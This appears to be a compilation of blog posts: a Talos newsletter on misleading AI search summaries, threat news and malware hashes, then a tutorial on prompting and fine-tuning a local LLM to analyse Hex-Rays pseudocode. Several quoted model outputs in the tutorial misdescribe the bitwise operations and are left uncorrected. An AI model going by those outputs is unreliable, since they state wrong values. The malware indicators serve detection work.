Here is what Bob Pette, Vice President of Enterprise Platforms at NVIDIA has to say.  “GPU virtualization requires advanced security, maximum cost efficiency, and accurate horsepower.  With GPU-P now available on NVIDIA GPUs in Windows Server Datacenter, customers can meet these requirements and run their key AI workloads to achieve next-level efficiencies.”

 

Windows Server 2025 is now available for customers to try out.  Click here to download preview media and use these powerful new capabilities.

 

The sliding doors of misinformation that come with AI-generated search results

6 June 2024 at 18:00
The sliding doors of misinformation that come with AI-generated search results

As someone who used to think that his entire livelihood would come from writing, I’ve long wondered if any sort of computer or AI could replace my essential functions at work. For now, it seems there are enough holes in AI-generated language that my ability to write down a complete, accurate and cohesive sentence is not in danger. 

But a new wave of AI-generated search results is already turning another crucial part of my job and education on its head: search engine optimization. 

Google’s internal AI tool recently started placing its own answers to common queries in Google’s search engine at the top of results pages, above credible or original news sources. At first, this resulted in some hilarious mix-ups, including telling people they could mix glue into pizza sauce to keep cheese adhered to their crust, or that it’s safe to eat a small number of rocks every day as part of a balanced diet. 

While hilarious, I’m worried about the potential implications that these features may have in the future on misinformation and fake news on more important or easier-to-believe topics than topping your pizza with glue. 

There currently doesn’t seem to be a rhyme or reason to when these types of results do or don’t show up. Google recently announced several changes to its AI-generated search results that now aim to prevent misleading or downright false information on search queries that cover more “important” topics.  

“For topics like news and health, we already have strong guardrails in place. For example, we aim to not show AI Overviews for hard news topics, where freshness and factuality are important. In the case of health, we launched additional triggering refinements to enhance our quality protections,” the company said in a blog post.  

When testing this out firsthand, I got mixed results. For “hard” news topics, they aren’t displaying AI-generated results at all. For example, when I tried searching for topics like “Who should I vote for in the 2024 presidential election?” and “Does the flu vaccine really work?” 

But I did get one of the AI-generated answers when I searched for “When is a fever too high for a toddler?” The displayed answer told me to call a pediatrician if my child is older than three months and has a fever of 102.2 degrees Fahrenheit or higher. Parents’ experience in this realm will differ, but for whatever it’s worth, my daughter’s pediatrician specifically recommended to us not to seek emergency help until a fever has reached 104 degrees or lasts for more than 24 hours even with the use of fever-reducing medicine. 

The sliding doors of misinformation that come with AI-generated search results

Google’s AI also displayed information when I searched for “Talos cryptocurrency scams” to try and find one of our past blog posts. This summary was accurate, though it may have copy-pasted some text directly from press coverage of the Talos research in question — that’s a whole different issue that the journalist in me is concerned about. What was also interesting to me was that, when I entered the same exact search query the next day, the results page didn’t display this AI Overview. 

The sliding doors of misinformation that come with AI-generated search results

Bing, Microsoft’s direct Google search engine competitor, is also using its own form of AI-curated content to answer queries.  

My concern here is when or if these types of answers are generated for news topics that are already rife with misinformation — think elections, politics, public health and violent crime. Even a slight slip up from one of these language models, such as getting a certain number incorrect or displaying a link from a known fake news or satire site, could have major consequences for spreading disinformation. 

On last week’s episode of Talos Takes, Martin Lee and I discussed how the most convincing forms of disinformation and fake news are short, punchy headlines or social media posts. The average person is not as media literate as we’d like to think, and seeing a quick and easy summary of a topic after they type an answer into a search engine is likely going to be good enough for most users on the internet. It’s usually going above and beyond just to ask someone to click through to the second page of Google’s search results.  

AI’s integration into search engines could change the way many of us interact with the internet — I’ve been used to using Google’s search engine as my homepage since I was in middle school. At the risk of sounding hyperbolic, I don’t want to assume that this is going to be an issue, perhaps companies will sort all the issues out, or AI overviews won’t come for more serious news topics than general life questions. But so far, the results shouldn’t inspire much confidence. 

The one big thing 

Cisco Talos recently discovered a new threat actor called “LilacSquid” targeting the IT and pharmacy sectors, looking to maintain persistent access on victim’s networks. This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader.”    

Why do I care? 

LilacSquid’s victimology includes a diverse set of victims consisting of information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe and the pharmaceutical sector in Asia indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources. Talos assesses with high confidence that this campaign has been active since at least 2021. Multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus — these are some of the most active threat actors currently on the threat landscape.  

So now what? 

LilacSquid commonly gains access to targeted victims by exploiting vulnerable web applications, so as always, it’s important to patch any time there’s a vulnerability on your network. Talos has also released new Snort rules, ClamAV signatures and other Cisco Security detection that can detect LilacSquid’s activities and the malware they use.  

Top security headlines of the week 

Several hospitals in London are still experiencing service disruptions after a cyber attack targeting a third-party pathology services provider. Some of the most high-profile healthcare facilities in Britain’s capital had to cancel or reschedule appointments or redirect patients to other hospitals. Lab services provider Synnovis confirmed the ransomware attack in a statement on Tuesday and said it was working with the U.K.’s National Health Service to minimize the effects on patients. This latest ransomware attack is illustrative of the larger cybersecurity issues facing the NHS, which manages a massive network of hospitals across the U.K. and has more than 1.7 million employees. In June 2023, the BlackCat ransomware group stole sensitive data from a few NHS hospitals and posted it on a data leak site. And just last month, a different group threatened to leak data from an NHS board overseeing a region of Scotland. The incident also forced other hospitals in the area to expand their capacities and operations to take on more patients, potentially stretching their resources thin. As of Wednesday afternoon, there was no timetable available for the resolution of these issues. (The Record by Recorded Future, Bloomberg

International law enforcement agencies teamed up for what they are calling one of the largest botnet disruptions ever. U.S. prosecutors announced last week that it dismantled a botnet called “911 S5,” arresting and charging its administrator as part of a global effort. The botnet reportedly infected more than 19 million residential IP addresses, using the compromised devices to mask cybercriminal activity for anyone who paid for access to the botnet. Adversaries had used 911 S5 for a range of malicious activities, including bomb threats, the distribution of child abuse imagery and the creation of fraudulent COVID-19 relief payments totaling more than $6 billion. The administrator, a People’s Republic of China native, is charged with creating and disseminating “malware to compromise and amass a network of millions of residential Windows computers worldwide,” according to a U.S. Department of Justice press release. The botnet was allegedly active between 2014 and July 2022. 911 built its network by offering a phony “free” VPN service to users, allowing them to browse the web while redirecting their IP address and protecting their privacy. However, the VPN service turned the target’s device into a traffic replay for the malicious 911 S5 customers. (U.S. Department of Justice, Krebs on Security

In a separate law enforcement campaign called “Operation Endgame,” law enforcement agencies from several countries disrupted droppers belonging to several malware families. Targets included IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and Trickbot. The coordinated effort between multiple European countries and the U.S. FBI led to four arrests of alleged malware operators and the seizure of more than 100 servers and 2,000 attacker-controlled domains. Eight Russian nationals have also been added to the list of Europe's most wanted fugitives for their alleged roles in developing the botnets behind Smokeloader and TrickBot, two of the most infamous malware families. Law enforcement agencies are also zeroing in on the person they believe to be behind the Emotet botnet, nicknamed “Odd.” "We have been investigating you and your criminal undertakings for a long time and we will not stop here," Operation Endgame warned in a video to threat actors. The investigation also found that the botnet operators had generated more than 69 million Euros by renting out their infrastructure to other threat actors so they could deploy ransomware. (Dark Reading, Europol

Can’t get enough Talos? 

Upcoming events where you can find Talos 

AREA41 (June 6 – 7) 

Zurich, Switzerland 

Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches. 

Cisco Connect U.K. (June 25)

London, England

In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe.

BlackHat USA (Aug. 3 – 8) 

Las Vegas, Nevada 

Defcon (Aug. 8 – 11) 

Las Vegas, Nevada 

BSides Krakow (Sept. 14)  

Krakow, Poland 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202 
MD5: e4acf0e303e9f1371f029e013f902262 
Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe 
Claimed Product: FileZilla 
Detection Name: W32.Application.27hg.1201 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0 
MD5: b4440eea7367c3fb04a89225df4022a6 
Typical Filename: Pdfixers.exe 
Claimed Product: Pdfixers 
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201 

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A   
Detection Name: PUA.Win.Dropper.Generic::1201 

How to Train Your Large Language Model

6 June 2024 at 19:09

Large Language Models (LLM) such as those provided by OpenAI (GPT3/4), Google (Gemini), Anthropic (Claude) can be a useful tool to include when conducting security audits or reverse engineering; however, one of the main downsides of using these tools is the data you are reviewing is processed server side, meaning any data analyzed by the tool must be uploaded/sent to the server.

While these services provide privacy policies that may double pinky swear your data is safe, and they will not use it for training if you opt-out, as a consultant we are often working with a client's data that is under NDA, preventing the usage of these services. Outside of cases where an NDA is in place, a policy won't protect you from platform bugs or provider monitoring that may leak your data or research. We have already seen an example of this with OpenAI publicly confirming they monitor the usage of its service to identify potentially 'evil' usage by bad-actors - https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/

Besides privacy concerns, a few other disadvantages of using a hosted service are:

  • service may go away (outage/sale)
  • modified to prevent malicious use (RE/Exploitation often flagged)
    • potentially resulting monitoring/account ban
  • costs (usually per-token)

Given these hurdles, smaller models that run locally on your own hardware are a promising path to leveraging a LLM without compromising your privacy or an NDA.

Comparisons

To be fair, it is worth pointing out the differences between the hosted LLM offerings and the local versions. The big difference is going to be the size of the training dataset and model parameter size - this can be thought of as the amount of 'knowledge' or data stored within the model, more parameters is going to indicate more 'knowledge' it can reference based on your input. OpenAI does not provide the details of GPT4, GPT3 was +100-billion parameters while GPT3.5's size has not been disclosed, speculation/research/guessing indicates it is much smaller (~22b parameters) - due to fine-tuning and/or other 'secret sauce'. It is speculated that the original GPT4 is in the +100-trillion parameter range. On the other hand, a local model that will run on consumer hardware is going to be in the 2b-70b range, this obviously is a clear disadvantage and is going to result in lower quality responses when compared to a hosted service.

Run Whatcha Brung

The actual size of the model you can run is going to be dependent on how much memory you have available - a decent rule is that the model will occupy 2x the memory of the parameter size: 2b/4gb, 7b/14gb, etc. The main exception to this rule is models that have been modified to use smaller values for stored parameters (quantization). Normally a model will use 16-bit floating point values for parameters; however, by clipping these values to smaller units (8/4-bit) the size can be reduced with minimal to no quality drop, resulting in lower memory usage and faster results.

When it comes to actual speed of results, it comes down to where you are running your inference. The best results are going to come from a recent GPU, ideally 24GB VRAM, meaning NVIDIA 3090 or 4090 - a used 3090 is best for the money for a turnkey solution. The next best setup is going to be an Apple Silicon (arm) Macbook/Studio/etc. - while this may be contentious, it is difficult to match the performance due to the shared memory architecture as you are able to use system ram for compute without a performance hit. While it is possible to run these models from system ram using the CPU on x86/64 machines, there is a performance hit compared to the previous options and results are most likely going to be slow - of course there are caveats here, as with anything you will find cases where highly tuned setups can perform well, in this case we are just considering ease of use and time to get started.

Execution

There are quite a few ways to run models locally, in this case I am using Ollama as it just-works and is fairly batteries-included for most use cases. Ollama provides installers for OSX, Linux, and Windows. Downloading and running a local model is as easy as executing the command ollama run with a model from the registry, the required files will automatically download and enter an interactive 'chat' shell:

% ollama run phi3
pulling manifest
pulling b26e6713dc74... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 2.4 GB
pulling fa8235e5b48f... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 1.1 KB
pulling 542b217f179c... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  148 B
pulling 8dde1baf1db0... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏   78 B
pulling f91db7a2deb9... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  485 B
verifying sha256 digest
writing manifest
removing any unused layers
success
>>> write me a sentence for my blog post about using a local running LLM to assist reversing binary applications.
 "Utilizing a local language model (LLM) tailored for our environment empowers developers to efficiently reverse binary applications, enhancing the debugging and
understanding of complex software systems."

>>> /bye

With the boring up-front details out of the way, we can try and do something useful.

Hammer Looking for Nails

As with any tool, it works best if you have a specific use case you are looking to apply it to, in this case we will be looking at using a model to help analyze Hex-Rays pseudocode. As pseudocode is close to C, most models that have been trained to include code should be able to aid with this task, in this case I have chosen to work with Mistral's 7b model. While there are larger models available that I could run on my hardware, this model has been found to perform quite well for its size and I really wanted to target something that would be relatively performant on lower end hardware.

Prompting Your Way Out

The first step in this process is to understand how well the model will execute a given task and identify the instructions needed to get a useful response. The following prompt was executed:

Analyze the following code and provide a description of what it does. Based on analysis provide updated variable names to replace the current ones.
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The prompt produced the following output:

The given code defines a function named `sub_C385C` that takes an integer argument `a1`. Inside the function, an integer variable `v1` is declared and initialized with the value of the memory location pointed to by `byte_11A2DC` with index `a1`.

Next, a check is made whether the result of calling `sub_CE2BC(0)` is true. If it is, then the value of `v1` is OR-ed with the binary number 4. The resulting value is assigned to a new variable `v2`, which remains undeclared in the given code snippet.

Finally, the original variable `v1` has its bits andered using the bitwise AND operator with the binary number -5 (0xFFFFFFFD) and this result is returned from the function.

To improve the readability of the code, you could consider renaming variables as follows:

```c
unsigned int __fastcall get_value_from_array(int arrayIndex)
{
  unsigned int value;

  value = memoryLocation[arrayIndex]; // Assuming memoryLocation is a properly defined pointer to the memory location pointed to by byte_11A2DC

  if ( checkCondition() )
    value |= 4; // OR with constant 4

  return value & 0xFFFFFFFD; // AND with binary number -5
}

Note: Replace `memoryLocation` and `checkCondition` with actual variable names.

This response is promising looking, but trying to programmatically use this response would be difficult. We can do better by adjusting our prompt to include instructions to return the values in JSON:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The following output was generated:

{
  "function_name": "process_byte_value",
  "comment": "This function takes an integer input, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.",
  "variables": [
    {
      "name": "input",
      "type": "int"
    },
    {
      "name": "byte_value",
      "type": "int"
    },
    {
      "name": "additional_flag",
      "type": "unsigned int"
    },
    {
      "name": "global_array",
      "type": "unsigned int[]",
      "description": "Global array of byte values."
    }
  ]
}

// The function named 'process_byte_value' takes an input integer, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.

unsigned int process_byte_value(int input) {
  int byte_value;
  unsigned int additional_flag = 0;

  if (sub_CE2BC() == true) { // Perform some global flag check here
    additional_flag = 4;
  }

  byte_value = global_array[input]; // Retrieve the corresponding byte value from the global array.

  return (byte_value & 0xFFFFFFF8) | additional_flag; // Perform bitwise operations on the byte_value and additional_flag before returning

Running the same input another time, we get a slight variation on the output

{
  "function_name": "processInputByte",
  "comment": "This function processes an input byte by checking a specific condition and modifying the byte accordingly.",
  "variables": [
    {"name": "inputByte", "type": "int"},
    {"name": "byteMask", "type": "unsigned int"},
    {"name": "conditionMet", "type": "bool"},
    {"name": "processedByte", "type": "unsigned int"}
  ]
}

// This function processes an input byte by checking a specific condition and modifying the byte accordingly.
unsigned int processInputByte(int inputByte) {
  unsigned int processedByte = BYTE_11A2DC[inputByte]; // Load byte from memory location
  bool conditionMet = sub_CE2BC(0); // Check specific condition

  if (conditionMet) {
    processedByte |= 4; // Set specific bit in the byte if condition is met
  }

  return processedByte & 0xFFFFFFFD; // Return the processed byte with certain bits cleared.

Neither of these are ideal as we only want the JSON structure to parse programmatically. By adjusting the prompt we can try to guide the output towards what we are expecting:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does. Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The resulting output of this prompt:

{
  "function_name": "processInputByte",
  "comment": "This function takes an input integer and processes a byte from a lookup table based on the input. If a certain condition is met, a bit is set in the output.",
  "variables": [
    {
      "name": "input",
      "description": "The input integer"
    },
    {
      "name": "byteValue",
      "description": "The value of the byte from the lookup table corresponding to the input"
    },
    {
      "name": "outputBitSet",
      "description": "An output variable that has a bit set if the condition is met"
    },
    {
      "name": "lookupTable",
      "description": "A global lookup table used to retrieve the byte value based on the input"
    }
  ]
}

This output is much better, it follows our instructions and produced a valid json structure only; however, if we run the same input again the output varies and returns a slightly different structure, along with details outside the JSON:

{
  "function_name": "process_byte_value",
  "comment": "Processes a byte value from the memory location specified by the input parameter and returns the result.",
  "variables": [
    {
      "name": "input_index",
      "type": "int",
      "description": "The index of the byte value to be processed."
    },
    {
      "name": "processed_value",
      "type": "unsigned int",
      "description": "The processed value of the input byte."
    },
    {
      "name": "is_special_condition_met",
      "type": "int",
      "description": "Flag indicating whether a special condition is met or not."
    }
  ]
}

unsigned int process_byte_value(int input_index)
{
  unsigned int processed_value;
  int is_special_condition_met = sub_CE2BC(0);

  processed_value = byte_11A2DC[input_index];

  if (is_special_condition_met)
    processed_value |= 4;

  return processed_value & 0xFFFFFFFD;
}

We could continue down this path changing the instructions trying to describe what your expected output should be for the given input, but eventually the response will end up deviating in some way breaking the ability to programmatically interface with it. Instead of trying to describe what we want, we can provide an example of what we want it to generate (single/multi-shot prompting). An important thing to remember when dealing with a LLM is that it is predicting the next token/word to output based on current input, by providing an example exchange you are creating a pattern for it to follow. The following revised prompt shows the original prompt modified to provide a single-shot example:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

In this prompt we have provided the instructions as we had previously as well as an example showing what a user would submit and the expected response, followed by the actual code we want analyzed. In this case, the responses match our desired output and are consistent across multiple executions.

Initial generated response:

{
  "function_name": "checkAndModifyByteValue",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC. If the sub_CE2BC function returns true, the value at that index is modified by setting the 4th bit to 1. The function then returns the original value with the 3 highest bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ModifiedByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByteWithBitSet"
    }
  ]
}

Followup executions:

{
  "function_name": "analyze_byte_from_array_and_apply_condition",
  "comment": "This function uses the argument a1 as index into byte_11A2DC, applies a condition using external function sub_CE2BC, and returns a bitwise value based on the result.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "AnalyzedByte"
    },
    {
      "original_name": "v2",
      "new_name": "ConditionalValue"
    }
  ]
}

{
  "function_name": "newFunctionName",
  "comment": "This function takes an integer argument a1, retrieves a value from the memory location byte\\_11A2DC with the index a1, and if the sub\\_CE2BC function returns true, sets a new variable value to the original value orpped with 4. The final return is a bitwise AND of the original value with 0xFFFFFFFD.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ResultVar"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedVar"
    }
  ]
}

{
  "function_name": "checkBitAndModifyByte",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC, checks if sub_CE2BC returns true and modifies the value if it does by setting the 4th bit. It then returns the original value with some bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByte"
    }
  ]
}

The results are decent and do not stray from the format/content we provided in our prompt; we can even include more examples with varying content (multi-shot) if we wanted to. At this point we have a basic prompt that does a specific task that we want relatively well, and the response is parsable (JSON) for automated use.

Light Customization

In the case you have a specific use case (agent/assistant/task) you can configure a version of your underlying pre-trained weights for use through Ollama's Modelfile interface. Ollama's Modelfile provides a lightweight layer to control/configure precomputed weights that can be easily edited and shared with other users. The following shows an example Modelfile configured for our potential Hex-Rays assistant using the prompt we created:

# defines the base pre-computed weights we want to use
FROM mistral:7b-instruct

# template is the format of the interactions with the model
# this is using templating provided by ollama where .System
# and .Prompt  are replaced with the defined variables 
TEMPLATE "{{ .System }}
[INST]
{{ .Prompt }}
[/INST]
"

# SYSTEM is the prompt/text that the model is started with, there are some special values included within this prompt
# that are described below, for now this is where the prompt we developed earlier goes
SYSTEM """<s>[INST]Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:[/INST]
</s>
"""
PARAMETER stop [INST]
PARAMETER stop [/INST]
# these control internal settings within the model to adjust how it behaves
PARAMETER temperature 1.2
PARAMETER top_k 100
PARAMETER top_p 0.09
PARAMETER num_ctx 4096
PARAMETER repeat_last_n 512
PARAMETER repeat_penalty 1.1

To side track for a second, each model has its own prompt format that is required to be used, as well as specific tokens used to indicate what is an instruction as well as start/stop tokens - these values can be found within the Tokenizer configuration file (tokenizer_config.json). For instance, the Mistral 7b-Instruct (https://huggingface.co/mistralai/Mistral-7B-Instruct-v0.1/blob/main/tokenizer_config.json) defines the special values and format we used in our Modelfile:

{
  ...
  ...
  "bos_token": "<s>",
  "chat_template": "{{ bos_token }}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if message['role'] == 'user' %}{{ '[INST] ' + message['content'] + ' [/INST]' }}{% elif message['role'] == 'assistant' %}{{ message['content'] + eos_token + ' ' }}{% else %}{{ raise_exception('Only user and assistant roles are supported!') }}{% endif %}{% endfor %}",
  "clean_up_tokenization_spaces": false,
  "eos_token": "</s>",
  ...
  ...
}

Not all models use the same chat_template structure or beginning-of-string (bos_token) or end-of-string (eos_token) values, so it is worth understanding where those formats and tokens come from.

After saving this file to disk (idapal_simple.modelfile), it can be loaded using Ollama:

% ollama create iDAPalSimple -f idapal_simple.modelfile
transferring model data
using existing layer sha256:e8a35b5937a5e6d5c35d1f2a15f161e07eefe5e5bb0a3cdd42998ee79b057730
using existing layer sha256:43070e2d4e532684de521b885f385d0841030efa2b1a20bafb76133a5e1379c1
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
creating new layer sha256:cd2ecea3b680dc83a3d3981ec5efcca96c74f7b5794e7008d8f94522bf024f0d
using existing layer sha256:b4f4d07d73c548c4cd652806db6d567ceff891910db2bf5d5410dcc7e76eeb5a
creating new layer sha256:96a6cc4cffa5e48e458c33efa5301f519279a08eb51ae4a9b33e9ac7abce76d9
writing manifest
success

After creation, the new configuration can be tested by entering the interactive mode via the run command and pasting in the previous code:

% ollama run iDAPalSimple
>>> unsigned int __fastcall sub_C385C(int a1)
... {
...   int v1;
...   unsigned int v2;
...
...   v1 = byte_11A2DC[a1];
...   if ( sub_CE2BC(0) )
...     v2 = v1 | 4;
...   return v1 & 0xFFFFFFFD;
... }
{
"function_name": "new_function_name_C385C",
"comment": "This function uses the argument a1 as an index into byte\_11A2DC. It calls sub\_CE2BC with an argument of 0 and sets v2 to the result of
bitwise OR operation between v1 and 4 if sub\_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between
v1 and 0xFFFFFFFD.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName_C385C"},{"original_name":"v2","new_name":"AnalyzedVarName_C385C_v2"}]
}

The observed response shows that the model works and is using the configured system prompt, returning the expected result after being provided only a code block as input. Ollama also provides an API that can be accessed locally (https://github.com/ollama/ollama/blob/main/docs/api.md), this can be used as seen in the following simple Python client:

import requests,json

def do_analysis(code):
    url = "http://localhost:11434/api/generate"
    headers = {"Content-Type": "application/json"}
    # inform the API we are using our configured model
    payload = {"model": "iDAPalSimple", "prompt": code, "stream": False,"format": "json"}
    res = requests.post(url, headers=headers, json=payload)
    try:
        t = res.json()['response']
        t = json.loads(t)
        return t
    except:
        print(f'error unpacking response')
        print(res.json()['response'])


input_code = '''unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}'''

result = do_analysis(input_code)
print(result)

% python simple_analysis.py
{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}

At this point, the current configuration and simple Python client could be integrated into an IDA Plugin that would work ok, but we can do better.

Fine-Tuning - step one: draw two circles

The initial training and creation of model weights that are released is a computationally expensive process, while follow on fine-tuning training is much less expensive to conduct. Fine-tuning provides a path to give a pre-trained model a "personality" by introducing new data and/or example interactions that would be considered "ideal" behavior when interacting with a user. The process is iterative and can be conducted multiple times until the model matches the expected behavior when interacting with a user.

While our small local model is never going to compete with a large, hosted service, fine-tuning can be used to boost its performance and compete on specific tasks or knowledge domains. To carry out a fine tune of a model you need complete the following steps:

  • Identify a target knowledge domain
  • Construct a dataset for your target domain
  • Train against your dataset
  • Evaluate trained model

For this task, the knowledge domain is already known - we want to fine tune a model that can be used to aid with analysis of Hex-Rays pseudocode. The next step is constructing a dataset, this is the difficult part. At a high level the dataset that needs to be built will be made of "instruction-following" examples, for instance the following shows what this would look like:

{
  "instruction":"Assist the user with a helpful process for drawing an animal.",
  "input":"How do I draw an Owl?",
  "output":"Drawing an Owl is simple, first draw some circles, then you draw the rest of the Owl."
},
{
  "instruction":"Assist the user with an idea for an animal to draw and provide them instructions.",
  "input":"",
  "output":"There are many animals you could choose to draw, my favorite is the Owl. An Owl is a fairly basic animal to draw, first draw some circles, then you draw the rest of the Owl"
}

These examples provide two types of instruction-following dataset entries. The first example starts by specifying the instruction to be followed with a matching input (user input) and finally the ideal output (generated result). The second example only provides an instruction along with an example output - the second example is useful for generative only responses that do not require user input, this type is not that useful for our current task but was included as an example. A dataset entry that would be useful for our task would look like the following:

{
  "instruction":"Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.",
  "input":"unsigned int __fastcall sub_C385C(int a1)\n {\n int v1;\n unsigned int v2;\n\n v1 = byte_11A2DC[a1];\n if ( sub_CE2BC(0) )\n v2 = v1 | 4;\n return v1 & 0xFFFFFFFD;\n }",
  "output":"{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}"
}

As a side note, following this exact formatting in JSON will allow for using the datasets library from Hugging Face and is going to be a common format.

